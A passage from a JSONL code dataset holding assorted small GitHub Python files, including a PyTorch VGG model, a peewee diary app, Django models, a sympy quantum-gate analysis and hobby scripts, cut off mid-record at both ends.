f\"{renamed_base}{file_extension}\"\n \n # If the pattern doesn't match, return the original filename\n return filename\n\n# Test the refactored function once again\nrename_file(test_filename)\n","repo_name":"Claudron/stimme-back","sub_path":"rename_file.py","file_name":"rename_file.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"86474840765","text":"number_1 = int(input('Введите число до которого нужно сделать таблицу: '))\r\nif number_1 <= 10:\r\n print('Считай сам!')\r\nelse:\r\n for table in range(1, number_1 + 1):\r\n for n in range(1, 11):\r\n answer = table * n\r\n print(answer, end='\\t')\r\n\r\n print('\\n')\r\n\r\n print('Две минуты. Готово!')\r\n\r\n","repo_name":"SulaevTamerlan/Tamada-study","sub_path":"first-project.py","file_name":"first-project.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73432810838","text":"#:: find the longest sub sequence in an array given\ndef LIS(array):\n lenghtOfArray = len(array) #lenght og the array\n lisCalculator = [1]*lenghtOfArray #initialize the a claculator to 1\n longestSubSequence = 0\n\n for i in range(1, lenghtOfArray): # for each variable in the array\n for j in range(i): #find the lenght longest sub sequence by comparison\n if array[i] > array[j] and lisCalculator[i] < lisCalculator[j] + 1:\n lisCalculator[i] = lisCalculator[j] + 1\n\n for i in range(lenghtOfArray):\n if longestSubSequence < lisCalculator[i]:\n longestSubSequence = lisCalculator[i]\n return longestSubSequence\n\n\na = [10, 22, 9, 33, 21, 50, 41, 60]\nprint(LIS(a))\n","repo_name":"ifegunni/dynamic-programming","sub_path":"longest subSequence.py","file_name":"longest subSequence.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"11170310607","text":"from typing import cast, Dict, List, Union\n\nimport torch\nfrom torch import Tensor\nfrom torch import nn\n\n__all__ = [\n \"VGG\",\n \"vgg11\", \"vgg13\", \"vgg16\", \"vgg19\",\n \"vgg11_bn\", \"vgg13_bn\", \"vgg16_bn\", \"vgg19_bn\",\n]\n\nvgg_cfgs: Dict[str, List[Union[str, int]]] = {\n \"vgg11\": [64, \"M\", 128, \"M\", 256, 256, \"M\", 512, 512, \"M\", 512, 512, \"M\"],\n \"vgg13\": [64, 64, \"M\", 128, 128, \"M\", 256, 256, \"M\", 512, 512, \"M\", 512, 512, \"M\"],\n \"vgg16\": [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, \"M\", 512, 512, 512, \"M\", 512, 512, 512, \"M\"],\n \"vgg19\": [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, 256, \"M\", 512, 512, 512, 512, \"M\", 512, 512, 512, 512, \"M\"],\n}\n\n\ndef _make_layers(vgg_cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential:\n layers: nn.Sequential[nn.Module] = nn.Sequential()\n in_channels = 3\n for v in vgg_cfg:\n if v == \"M\":\n layers.append(nn.MaxPool2d((2, 2), (2, 2)))\n else:\n v = cast(int, v)\n conv2d = nn.Conv2d(in_channels, v, (3, 3), (1, 1), (1, 1))\n if batch_norm:\n layers.append(conv2d)\n layers.append(nn.BatchNorm2d(v))\n layers.append(nn.ReLU(True))\n else:\n layers.append(conv2d)\n layers.append(nn.ReLU(True))\n in_channels = v\n\n return layers\n\n\nclass VGG(nn.Module):\n def __init__(self, vgg_cfg: List[Union[str, int]], batch_norm: bool = False, num_classes: int = 1000) -> None:\n super(VGG, self).__init__()\n self.features = _make_layers(vgg_cfg, batch_norm)\n\n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n\n self.classifier = nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(0.5),\n nn.Linear(4096, num_classes),\n )\n\n # Initialize neural network weights\n self._initialize_weights()\n\n def forward(self, x: Tensor) -> Tensor:\n return self._forward_impl(x)\n\n # Support torch.script function\n def _forward_impl(self, x: Tensor) -> Tensor:\n out = self.features(x)\n out = self.avgpool(out)\n out = torch.flatten(out, 1)\n out = self.classifier(out)\n\n return out\n\n def _initialize_weights(self) -> None:\n for module in self.modules():\n if isinstance(module, nn.Conv2d):\n nn.init.kaiming_normal_(module.weight, mode=\"fan_out\", nonlinearity=\"relu\")\n if module.bias is not None:\n nn.init.constant_(module.bias, 0)\n elif isinstance(module, nn.BatchNorm2d):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n elif isinstance(module, nn.Linear):\n nn.init.normal_(module.weight, 0, 0.01)\n nn.init.constant_(module.bias, 0)\n\n\ndef vgg11(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg11\"], False, **kwargs)\n\n return model\n\n\ndef vgg13(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg13\"], False, **kwargs)\n\n return model\n\n\ndef vgg16(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg16\"], False, **kwargs)\n\n return model\n\n\ndef vgg19(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg19\"], False, **kwargs)\n\n return model\n\n\ndef vgg11_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg11\"], True, **kwargs)\n\n return model\n\n\ndef vgg13_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg13\"], True, **kwargs)\n\n return model\n\n\ndef vgg16_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg16\"], True, **kwargs)\n\n return model\n\n\ndef vgg19_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg19\"], True, **kwargs)\n\n return model\n","repo_name":"Lornatang/VGG-PyTorch","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"85"} +{"seq_id":"36063656610","text":"from MDRSREID.Networks.RESIDUAL_NETWORK.RESNET.resnet import get_resnet\n\n# There are the function name, not the variable.\nbackbone_factory = {\n 'resnet18': get_resnet,\n 'resnet34': get_resnet,\n 'resnet50': get_resnet,\n 'resnet101': get_resnet,\n 'resnet152': get_resnet,\n}\n\n\ndef create_backbone(cfg):\n \"\"\"\n Use factory mode to create the backbone.\n The backbone is ResNet.\n\n :return: model = get_resnet(cfg)\n \"\"\"\n return backbone_factory[cfg.model.backbone.name](cfg)\n\n\nif __name__ == '__main__':\n from MDRSREID.Trainer.pre_initialization.init_config import init_config\n import torch\n\n print(\"[PYTORCH VERSION]:\", torch.__version__)\n cfg = init_config()\n print(\"ResNet Name:{}\\n\".format(cfg.model.backbone.name))\n create_backbone(cfg)\n","repo_name":"nickhuang1996/HJL-re-id","sub_path":"MDRSREID/Networks/create_backbone.py","file_name":"create_backbone.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"85"} +{"seq_id":"8205497613","text":"import torch\r\n\r\n\r\nclass Mypara:\r\n def __init__(self):\r\n pass\r\n\r\n\r\nmypara = Mypara()\r\nmypara.device = torch.device(\"cuda:0\")\r\nmypara.batch_size_train = 8\r\nmypara.batch_size_eval = 10\r\nmypara.num_epochs = 40\r\nmypara.TFnum_epochs = 20\r\nmypara.TFlr = 1.5e-5\r\nmypara.early_stopping = True\r\nmypara.patience = 4\r\nmypara.warmup = 2000\r\n\r\n# data related\r\nmypara.adr_pretr = (\r\n \"./data/up150_tauxy/CMIP6_separate_model_up150m_tauxy_Nor_kb.nc\"\r\n)\r\nmypara.interval = 4\r\nmypara.TraindataProportion = 0.9\r\nmypara.all_group = 13000\r\nmypara.adr_eval = (\r\n \"./data/up150_tauxy/SODA_ORAS_group_temp_tauxy_before1979_kb.nc\"\r\n)\r\nmypara.needtauxy = True\r\nmypara.input_channal = 7 # n_lev of 3D temperature\r\nmypara.output_channal = 7\r\nmypara.input_length = 12\r\nmypara.output_length = 20\r\nmypara.lev_range = (1, 8)\r\nmypara.lon_range = (45, 165)\r\nmypara.lat_range = (0, 51)\r\n# nino34 region\r\nmypara.lon_nino_relative = (49, 75)\r\nmypara.lat_nino_relative = (15, 36)\r\n# patch size\r\nmypara.patch_size = (3, 4)\r\nmypara.H0 = int((mypara.lat_range[1] - mypara.lat_range[0]) / mypara.patch_size[0])\r\nmypara.W0 = int((mypara.lon_range[1] - mypara.lon_range[0]) / mypara.patch_size[1])\r\nmypara.emb_spatial_size = mypara.H0 * mypara.W0\r\n\r\n# model\r\nmypara.model_savepath = \"./model/\"\r\nmypara.seeds = 1\r\nmypara.d_size = 256\r\nmypara.nheads = 4\r\nmypara.dim_feedforward = 512\r\nmypara.dropout = 0.2\r\nmypara.num_encoder_layers = 4\r\nmypara.num_decoder_layers = 4\r\n","repo_name":"zhoulu327/Code_of_3D-Geoformer","sub_path":"Code/myconfig.py","file_name":"myconfig.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"85"} +{"seq_id":"21015793997","text":"import os\nimport hashlib\nimport urllib\nimport requests\nimport platform\nimport time\n\nclass peladophobian(object):\n def __init__(self):\n pass\n\n def mlgsay(self, text):\n return mlgsay(text)\n\ndef mlgsay(text, play=True):\n payload = u\"451mp3\" + text\n phash = hashlib.md5(payload.encode(\"utf-8\")).hexdigest()\n url = u\"http://cache-a.oddcast.com/c_fs/{0}.mp3?engine=4&language=1&voice=5&text={1}&useUTF8=1\".format(phash, text)\n if not os.path.exists(phash+\".mp3\"):\n r = requests.get(url, stream=True)\n with open(phash + \".mp3\", \"wb\") as f:\n for chunk in r.iter_content(chunk_size=2048):\n if chunk:\n f.write(chunk)\n f.flush()\n if play:\n os.system(\"ffplay mlg.mp3 -autoexit -fs -showmode 1\")\n return phash + \".mp3\"\n\nif __name__ == \"__main__\":\n while True:\n try:\n text = None\n if sys.version_info[0] > 2:\n text = input(\">>\")\n else:\n text = raw_input(\">>\")\n mlgsay(text)\n except KeyboardInterrupt:\n break\n","repo_name":"milkey-mouse/illuminati-confirmed","sub_path":"loominarty/loominarty/peladophobian.py","file_name":"peladophobian.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12665821410","text":"from peewee import *\nimport datetime\nimport sys\nfrom collections import OrderedDict\n\n\n\n\n\ndb= SqliteDatabase(\"diary.db\")\n\n\nclass Entry(Model):\n #contenido\n #timestamp\n content = TextField()\n timestamp = DateTimeField(default=datetime.datetime.now)\n\n class Meta:\n database= db\n\ndef create_and_connect():\n \"\"\"Connect to the database\"\"\"\n db.connect()\n db.create_tables([Entry],safe=True)\n\ndef menu_loop():\n \"\"\" Show menu \"\"\"\n choice =None\n while choice != 'q':\n print(\"press 'q' to quit\")\n for key,value in menu.items():\n print(\"{}) {}\".format(key,value.__doc__))\n choice = input(\"Action: \").lower().strip()\n if choice in menu:\n menu[choice]()\n\n\ndef add_entry():\n \"\"\"Adds Entry\"\"\"\n print(\"Enter your thoughts. Press ctr + D to finish\")\n data = sys.stdin.read().strip()\n \n if data:\n if input(\"Do you want to save entry? [Y/N]\").lower().strip() != 'n':\n Entry.create(content=data)\n print(\"your entry was saved successfully \")\n\ndef view_entry(search_query=None):\n \"\"\"View all entries\"\"\"\n entries =Entry.select().order_by(Entry.timestamp.desc())\n\n if search_query:\n entries = entries.where(Entry.content.contains(search_query))\n\n for entry in entries:\n timestamp= entry.timestamp.strftime('%A %B %d, %Y %I:%M%p')\n print('\\n')\n print(timestamp)\n print('-'*len(timestamp))\n print(entry.content)\n print('\\n')\n print('-'*len(entry.content))\n print('n) next entry')\n print('e) edit entry')\n print('d) delete entry')\n print('q) return to menu')\n\n next_action= input(\"Action: \").lower().strip()\n if next_action == 'q':\n break\n elif next_action =='e':\n edit_entry()\n elif next_action == 'd':\n delete_entry(entry)\ndef edit_entry():\n \"\"\"Edit Entries\"\"\"\n entradas = sys.stdin.read().strip()\n Entry.content = entradas\n entradas.save()\ndef search_entries():\n \"\"\"Search Entries\"\"\"\n search_query= input(\"Search query: \").strip()\n view_entry(search_query)\n\ndef delete_entry(entry):\n \"\"\"Delete entries\"\"\"\n action= input(\"are you sure? [Y/N]: \").lower().strip()\n if action == 'y':\n entry.delete_instance()\n\n\nmenu= OrderedDict([\n ('a',add_entry),\n ('v',view_entry),\n ('s',search_entries),\n ('d',delete_entry)\n ])\n\n\nif __name__ == '__main__': # se usa para cuando pones from diary import solo importe las funciones\n create_and_connect()\n menu_loop()\n","repo_name":"ppinac/Practica_Python","sub_path":"Diary/diary.py","file_name":"diary.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7064819152","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator,MinValueValidator\nfrom djmoney.models.fields import MoneyField\nfrom django.db.models.signals import pre_save\nfrom django.utils.text import slugify\n\nclass Book(models.Model):\n book_name=models.CharField(max_length=100)\n author_name=models.OneToOneField('Author', on_delete=models.CASCADE)\n option=(('p',\"published\"), ('u',\"unpublished\"))\n status=models.CharField(choices=option, default=\"p\", max_length=2)\n cost = MoneyField(max_digits=5, decimal_places=2, default_currency='INR')\n publish_date_time=models.DateTimeField(auto_now=False)\n\n def __str__(self):\n return str(self.book_name)\n \nclass Author(models.Model):\n author_name=models.CharField(max_length=100)\n author_rating=models.FloatField(validators=[MinValueValidator(0.0),\n MaxValueValidator(9.9)] )\n sub_genre=models.OneToOneField('Subgenre' ,on_delete=models.CASCADE)\n about=models.TextField(null=True, blank=True)\n\n def __str__(self):\n return str(self.author_name)\n\nclass Genre(models.Model):\n genre_name=models.CharField(max_length=80 , unique=False)\n genre_details=models.CharField(max_length=100)\n slug=models.SlugField(unique=False)\n\n class Meta:\n ordering=['genre_name']\n def __str__(self):\n return str(self.genre_name)\n\ndef pre_save_genre(sender, instance ,*args, **kwargs):\n slug=slugify(instance.genre_name)\n flag=Genre.objects.filter(slug=slug).exists()\n if flag:\n # slug=\"{}-{}\".format(slug,str(instance.id))\n slug=\"%s-%s\" %(slug,instance.id)\n else:\n instance.slug=slug\npre_save.connect(pre_save_genre,sender=Genre)\n\n\nclass Subgenre(models.Model):\n genre_name=models.OneToOneField('Genre',on_delete=models.CASCADE,unique=False)\n subgenre_name=models.CharField(max_length=100, null=True)\n description=models.TextField(null=True, blank=True)\n slug=models.SlugField(unique=False)\n\n def __str__(self):\n return str(self.subgenre_name)\n\n\ndef pre_save_subgenre(sender, instance ,*args, **kwargs):\n slug=slugify(instance.subgenre_name)\n flag=Subgenre.objects.filter(slug=slug).exists()\n if flag:\n # slug=\"{}-{}\".format(slug,str(instance.id))\n slug=\"%s-%s\" %(slug,instance.id)\n else:\n instance.slug=slug\npre_save.connect(pre_save_subgenre,sender=Subgenre)\n\n\n","repo_name":"Abhi868/Assignment","sub_path":"assign/MovieInfo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41067737181","text":"from turtle import Turtle, Screen\n\nMOVE_DISTANCE = 20\n\nclass EnemyPaddle(Turtle):\n def __init__(self):\n super().__init__()\n self.create_paddle()\n\n def create_paddle(self):\n self.shape(\"square\")\n self.color(\"white\")\n self.penup()\n self.goto(550, 0)\n self.resizemode(\"user\")\n self.shapesize(1, 4, 1)\n\n\n def match_ball(self, ball):\n if self.ycor() < ball.ycor():\n self.setheading(90)\n self.forward(20)\n elif self.ycor() > ball.ycor():\n self.setheading(270)\n self.forward(20)\n","repo_name":"MrBen89/Simple_python_exercises","sub_path":"simpleprojects/pong_enemy.py","file_name":"pong_enemy.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14404293095","text":"\n\ndef containsNearbyAlmostDuplicate(nums, k, t):\n s= set()\n for i in range(len(nums)):\n\n fil = filter(lambda x: x >= nums[i] - t, s)\n\n for f in fil:\n if f in s and f <= nums[i] + t:\n return True\n break\n\n s.add(nums[i])\n\n if len(s) == k + 1:\n s.remove(nums[i - k])\n\n return False\n\nif __name__ == '__main__':\n print(containsNearbyAlmostDuplicate([-3,3,-6],2,3))","repo_name":"LiuHan0723/MyLeetCodeExercise","sub_path":"containDuplicate220.py","file_name":"containDuplicate220.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10830711650","text":"from sympy import *\nfrom sympy_diamond import U, U00, U11, Up, Um, s00, s01, s10, s11, _sp, _sm, cp_state, hadamard_division, \\\n hadamard_product, SWAP, iSWAP, density_matrix, CNOT, H, U3, CZ, X, Y, Z\n\nx = Wild('x')\ny = Wild('y')\n\na00, a01, a10, a11, ap, am = symbols('a_00 a_01 a_10 a_11 a_p a_m', complex=True)\nb00, b01, b10, b11, bp, bm = symbols('b_00 b_01 b_10 b_11 b_p b_m', complex=True)\n# Basis coffs.\na = [a00, a11, ap, am]\nb = [b00, b11, bp, bm]\nbA = [b00, b01, b10, b11]\n# Time\nt = Symbol('t', real=True, positive=True)\na_abs_square_num = sum([Abs(a[n])**2 for n in range(4)])\nUt = U(t)\n\nA = Matrix.hstack(s00, s01, s10, s11)\nB = Matrix.hstack(s00, s11, _sp, _sm)\nC = Matrix.hstack(s00, _sp, _sm, s11)\nD = Matrix.hstack(s00, (s11 + _sp)/sqrt(2), (s11 - _sp)/sqrt(2), _sm)\nT_BA = A @ B.T # Coordinate transformation matrix from A to B basis\nT_AB = T_BA.T # B @ A.T also, but since they are unitary, this il the case\nT_CA = A @ C.T\nT_AC = T_CA.T\nassert T_BA @ T_AB == eye(4)\nassert T_CA @ T_AC == eye(4)\n\nprint('T_BA')\npprint(T_BA)\nprint('T_AB')\npprint(T_AB)\n\nT_I_BA = kronecker_product(eye(4), T_BA)\nT_I_AB = kronecker_product(eye(4), T_AB)\nT_BA_I = kronecker_product(T_BA, eye(4))\nT_AB_I = kronecker_product(T_AB, eye(4))\nT_AB_BA = kronecker_product(T_AB, T_BA)\nT_BA_AB = kronecker_product(T_BA, T_AB)\nT_AB_AB = kronecker_product(T_AB, T_AB)\nT_BA_BA = kronecker_product(T_BA, T_BA)\n\ndef basis_change(expr, init_basis: Matrix, final_basis: Matrix):\n T_IF = simplify(final_basis @ init_basis.T)\n T_FI = simplify(T_IF.T)\n eye_check = simplify(T_FI @ T_IF)\n assert eye_check == eye(init_basis.cols), f'Transformations not good!\\n {pprint(eye_check)}'\n return simplify(T_FI @ expr @ T_IF)\n\n# The U-gate is in the basis AA (as we have rewritten the C-qubits's basis vectors in terms\n# of the regular computationel basis (A basis), in the definition of the U-gate),\n# now we try to diagonalize it by writing it in the BB basis!\nAA = kronecker_product(A, A)\nBA = kronecker_product(B, A)\nAB = kronecker_product(A, B)\nBB = kronecker_product(B, B)\nCB = kronecker_product(C, B)\nCC = kronecker_product(C, C)\nDB = kronecker_product(D, B)\nU_BB = basis_change(Ut, AA, BB)\nU_CB = basis_change(Ut, AA, CB)\nU_AB = basis_change(Ut, AA, AB)\nU_CC = basis_change(Ut, AA, CC)\nU_DB = basis_change(Ut, AA, DB)\n\nprint('U (U_AA)')\npprint(Ut)\nprint(latex(Ut))\n\nprint('U_CC')\npprint(U_CC)\n\n# P, D = U(t).diagonalize()\n# pprint(P)\n# pprint(D)\n# U_BB = (T_I_BA @ U(t) @ T_I_AB).simplify()\nprint('U_BB')\npprint(U_BB) # Transform the basis of T to B. It's not so much a mess\nassert (U_BB @ U_BB.T.conjugate()).simplify() == eye(2**4) # Just to sanity check\n# Now we look at a collective state in the BxB-basis\nc = symbols('c_0000 c_0011 c_00p c_00m c_1100 c_1111 c_11p c_11m c_p00 c_p11 c_pp c_pm c_m00 c_m11 c_mp c_mm')\nstate_TC0 = Matrix([*[[_c] for _c in c]])\n# Apply the U_BB\nstate_TC = U_BB @ state_TC0\nprint('state_TC')\npprint(state_TC)\n\nprint('TC probabs')\ndm_TC = density_matrix(state_TC)\nfor i,_c in enumerate(c):\n pprint(_c)\n pprint(dm_TC[i,i].simplify())\n\nprint('iSWAP in A basis')\npprint(iSWAP(t))\nprint('iSWAP in B basis')\npprint((T_BA @ iSWAP(t) @ T_AB).simplify())\n\nprint('SWAP in A basis')\npprint(SWAP(t))\nprint('SWAP in B basis')\npprint((T_BA @ SWAP(t) @ T_AB).simplify())\n\nprint('CNOT in B basis')\npprint((T_BA @ CNOT @ T_AB).simplify())\n\n# pprint((T_AB_I @ U(t) @ T_BA_I).simplify()) # Transform the basis of C to A. It's a mess\n# pprint((T_AB_BA @ U(t) @ T_BA_AB).simplify()) # Transform the basis of C to A and T to B. It's a mess\n\nprint('Basis matrices in B-basis')\nUi_A = [U00(t), U11(t), Up(t), Um(t)]\nUi_B = [simplify(T_BA @ Ui @ T_AB) for Ui in Ui_A]\nprint('U00_B')\npprint(Ui_B[0])\nprint('U11_B')\npprint(Ui_B[1])\nprint('Up_B')\npprint(Ui_B[2])\nprint('Um_B')\npprint(Ui_B[3])\nexit()\n\nstateT_B = Matrix([\n [b[0]],\n [b[1]],\n [b[2]],\n [b[3]]\n])\n\nstateT_A = Matrix([\n [bA[0]],\n [bA[1]],\n [bA[2]],\n [bA[3]]\n])\n\n# The init dm of the T-state\nrho__T_B0 = stateT_B @ stateT_B.transpose().conjugate()\nrho__T_A0 = stateT_A @ stateT_A.transpose().conjugate()\nfor i in range(4):\n rho__T_B0[i, i] = rho__T_B0[i, i].replace(y * x * x.conjugate(), y * Abs(x) ** 2)\n rho__T_A0[i, i] = rho__T_A0[i, i].replace(y * x * x.conjugate(), y * Abs(x) ** 2)\n\n# The T-state after application of the U-gate\nrho__T_B = Matrix.zeros(4)\nrho__T_A = Matrix.zeros(4)\nfor i in range(4):\n rho__T_B += Abs(a[i]) ** 2 * Ui_B[i] @ rho__T_B0 @ Ui_B[i].replace(t, -t)\n rho__T_A += Abs(a[i]) ** 2 * Ui_A[i] @ rho__T_A0 @ Ui_A[i].replace(t, -t)\n\ndef simplify_rho_B(rho):\n for i in range(4):\n rho[i, i] = rho[i, i].collect(Abs(b[i])**2)\n rho[i, i] = rho[i, i].replace(a_abs_square_num, 1)\n for i in range(4):\n for j in range(4):\n rho[i, j] = rho[i, j].collect(b[i] * b[j].conjugate())\n return rho\n\ndef simplify_rho_A(rho):\n for i in range(4):\n rho[i, i] = rho[i, i].collect(Abs(bA[i])**2)\n rho[i, i] = rho[i, i].replace(a_abs_square_num, 1)\n for i in range(4):\n for j in range(4):\n rho[i, j] = rho[i, j].collect(bA[i] * bA[j].conjugate())\n return rho\n\nrho__T_B = MutableMatrix(rho__T_B)\nrho__T_B = simplify_rho_B(rho__T_B)\n\nrho__T_A = MutableMatrix(rho__T_A)\nrho__T_A = simplify_rho_A(rho__T_A)\n\nprint('rho__T_B')\npprint(rho__T_B)\n# print('rho__T_A')\n# pprint(rho__T_A)\n\na00_, a11_, ap_, am_ = Abs(a[0])**2, Abs(a[1])**2, Abs(a[2])**2, Abs(a[3])**2\na01_, a10_ = Abs(a01)**2, Abs(a10)**2\n\nprint('rho__T_A from rho__T_B')\n# rho__T_A_fromB = T_AB * rho__T_B * T_BA\nrho__T_A_fromB = T_AB @ rho__T_B @ T_BA\nrho__T_A_fromB = rho__T_A_fromB.replace(bp, (b01 + b10)/sqrt(2)).replace(bm, (b01 - b10)/sqrt(2)).expand()\nfor i in range(4):\n for j in range(4):\n entry_AfromB = rho__T_A_fromB[i, j]\n entry_AfromB = entry_AfromB.replace(Abs(x + y)**2, Abs(x)**2 + Abs(y)**2 + x*y.conjugate() + y*x.conjugate())\n for sign in [1, -1]:\n for _a in a:\n entry_AfromB = entry_AfromB.subs(b01 * exp(sign*I*t) * conjugate(b01) * Abs(_a)**2 / 4,\n Abs(b01)**2 * exp(sign*I*t) * Abs(_a)**2 / 4)\n entry_AfromB = entry_AfromB.subs(b10 * exp(sign*I*t) * conjugate(b10) * Abs(_a)**2 / 4,\n Abs(b10)**2 * exp(sign*I*t) * Abs(_a)**2 / 4)\n for _a in a:\n entry_AfromB = entry_AfromB.subs(b01 * conjugate(b01) * Abs(_a)**2 / 2,\n Abs(b01)**2 * Abs(_a)**2 / 2)\n entry_AfromB = entry_AfromB.subs(b10 * conjugate(b10) * Abs(_a)**2 / 2,\n Abs(b10)**2 * Abs(_a)**2 / 2)\n entry_A = rho__T_A[i, j].expand()\n diff = entry_AfromB - entry_A\n equal = diff == 0\n if not equal:\n print(i,j)\n print('diff')\n diff = diff.collect(a00_)\n diff = diff.subs(a00_, 1 - a11_ - ap_ - am_).expand()\n diff = diff.expand()\n diff = diff.collect(exp(I*t))\n pprint(diff)\n assert diff == 0\n # exit()\n\nexit()\n\n# print('rho__T_A')\n# pprint(rho__T_A) # This is very cluttered\n\nprint('rho__T_B0')\npprint(rho__T_B0)\n\nprint('rho__T_B / rho__T_B0')\nrho__T_B_div_rho__T_B0 = hadamard_division(rho__T_B, rho__T_B0)\npprint(rho__T_B_div_rho__T_B0)\ndef rewrite_rho__T_B(rho):\n rho[0,1] = rho[0,1].replace(am_, 1 - a00_ - a11_ - ap_).collect(a00_).collect(a11_).collect(ap_).collect(exp(I*t) - 1)\n rho[1,0] = rho[1,0].replace(am_, 1 - a00_ - a11_ - ap_).collect(a00_).collect(a11_).collect(ap_).collect(exp(-I*t) - 1)\n\n rho[0,2] = rho[0,2].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(I*t) - 1)\n rho[2,0] = rho[2,0].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(-I*t) - 1)\n\n rho[0,3] = rho[0,3].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(I*t) - 1)\n rho[3,0] = rho[3,0].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(-I*t) - 1)\n\n rho[1,2] = rho[1,2].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(-I*t) - 1)\n rho[2,1] = rho[2,1].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(I*t) - 1)\n\n rho[1,3] = rho[1,3].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(-I*t) - 1)\n rho[3,1] = rho[3,1].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(I*t) - 1)\n\n rho[2,3] = rho[2,3].replace(ap_, 1 - a00_ - a11_ - am_).collect(a00_).collect(a11_).collect(exp(-I*t) - 1)\n rho[3,2] = rho[3,2].replace(ap_, 1 - a00_ - a11_ - am_).collect(a00_).collect(a11_).collect(exp(-I*t) - 1)\n # rho[0,2] = rho[0,2].replace(x*y - y, )\n return rho\nrho__T_B_div_rho__T_B0 = rewrite_rho__T_B(rho__T_B_div_rho__T_B0)\nprint('... simplified')\npprint(rho__T_B_div_rho__T_B0)\npprint(rho__T_B_div_rho__T_B0.free_symbols)\n\nprint('rho__T_B / rho__T_B0 - Matrix.ones(4)')\npprint(rho__T_B_div_rho__T_B0 - Matrix.ones(4))\n\nz_t = Symbol('z(t)') # z(t)\npprint(z_t)\nexit()\n\nprint('rho__T_B / rho__T_B0 for a00 = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 1).replace(a[1], 0).replace(a[2], 0).replace(a[3], 0))\nprint('rho__T_B / rho__T_B0 for a11 = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 0).replace(a[1], 1).replace(a[2], 0).replace(a[3], 0))\nprint('rho__T_B / rho__T_B0 for ap = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 0).replace(a[1], 0).replace(a[2], 1).replace(a[3], 0))\nprint('rho__T_B / rho__T_B0 for am = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 0).replace(a[1], 0).replace(a[2], 0).replace(a[3], 1))\n\na_U_sum = Matrix.zeros(4)\nfor i in range(4):\n a_U_sum += a[i] * Ui_B[i]\npprint(a_U_sum @ a_U_sum.transpose().conjugate())\n\n##### STOP #####\nexit()\n\nstate_T, vs, phis = cp_state(2, ['v', 'phi'])\npprint(state_T @ state_T.T)\n\nU_T_t = a[0]*U00(t) + a[1]*U11(t) + a[2]*Up(t) + a[3]*Um(t)\n\nprint('U_T_t')\npprint(U_T_t)\n\nUt = U(t)\nstateC = Matrix([\n [a[0]],\n [(a[2] + a[3])/sqrt(2)],\n [(a[2] - a[3])/sqrt(2)],\n [a[1]]\n])\n\nstate = kronecker_product(stateC, stateT_B)\n\nprint('Ut @ state')\npprint(Ut @ state)\n\nprint('kron eye x U_T_t')\nU_CT_t = kronecker_product(eye(2**2), U_T_t)\npprint((U_CT_t @ state).simplify())\n","repo_name":"EmilBahnsen/masters-source","sub_path":"sympy_diamond/U_function_of_C_and_t.py","file_name":"U_function_of_C_and_t.py","file_ext":"py","file_size_in_byte":10319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74082828118","text":"from vilipix.items import VilipixItem\nimport scrapy\nfrom scrapy import Spider, Request\nfrom datetime import datetime, date, timedelta\nfrom urllib.parse import urlencode\nimport json\n\nIMAGES = 25 # 手动指定一天的图片数\n\nclass PixivSpider(scrapy.Spider):\n name = 'pixiv'\n allowed_domains = ['vilipix.com']\n 